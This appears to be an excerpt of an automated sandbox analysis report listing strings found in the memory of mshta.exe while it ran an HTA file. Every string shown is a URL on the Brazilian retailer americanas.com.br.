Source: mshta.exe, 00000000.00000002.25488181040.000000000AC1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402328770.000000000AC1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401838854.000000000AC13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401507649.000000000AC06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/espec
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405052073.000000000B734000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/afiliados?chave=dk_hm_ft_00_02_afiliados
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465598138.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AA7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489837872.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464016855.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398642519.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AA77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/black-friday?chave=dk_hm_ft_00_09_blackfriday
Source: mshta.exe, 00000000.00000003.25392143865.000000000A9B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443475613.000000000A9B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486282298.000000000A9B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/blacko
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25436096053.0000000009C15000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429674983.0000000009C14000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379435044.000000000B70A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/celular-5g?chave=pfm_hm_tt_1_0_tecnologia5g
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/celular-5g?chave=pfm_hm_tt_1_0_tecnologia5gy
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460571625.0000000009578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484145246.0000000009467000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.0000000006766000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397591598.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460802201.0000000009466000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485077549.0000000009578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/lojas-oficiais?chave=prf_hs_0_dt_1_00_lojasoficiais
Source: mshta.exe, 00000000.00000003.25435794233.0000000009C5D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398339352.0000000009C5B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422811267.0000000009C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=dk_hm_ats_2_0_natal24https://www.americanas.com.b
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377309102.000000000AB6C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488009024.000000000ABF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377467003.000000000AB73000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=dk_hm_tp_1_0_natal24
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/oferta-do-dia?chave=dk_hm_ats_2_9_odddowg
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484145246.0000000009467000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462689449.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460429722.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486497616.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488630378.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.0000000006766000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460802201.0000000009466000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/oferta-do-dia?chave=prf_hm_0_tt_7_
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443475613.000000000A971000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/acessibilidade
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/acessibilidade=pf
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/acessibilidadetw
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465598138.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395191337.0000000006F4B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465888443.000000000AAFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444767802.000000000950D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484826803.000000000950E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AA7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AAF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380701477.0000000006F4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464016855.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483468207.0000000006F4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486544314.000000000AA7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411529883.0000000009507000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487130181.000000000AAFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AA77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411065237.0000000006F4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/americanas
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.0000000009473000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484186260.0000000009474000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.0000000006766000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mais-clima?chave=pfm_home_sustentabilidade_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mais-clima?chave=pfm_home_sustentabilidade_menutic
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465598138.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AA7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464016855.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AA77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379435044.000000000B70A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=brd_hm_bt_0_footer_amundo
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=dk_hm_branding_amundow?
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.0000000009473000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484186260.0000000009474000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=pfm_home_amundo_menu
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=pfm_home_amundo_menu#
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484145246.0000000009467000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.0000000006766000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460802201.0000000009466000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=prf_hs_0_dt_1_00_amundo
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_baixeoapp_faixaLin&
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477835168.000000000AC03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484145246.0000000009467000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462689449.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460429722.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486497616.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488630378.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401685590.000000000ABFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.0000000006766000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=prf_hs_0_dt_1_00_baixeoapp
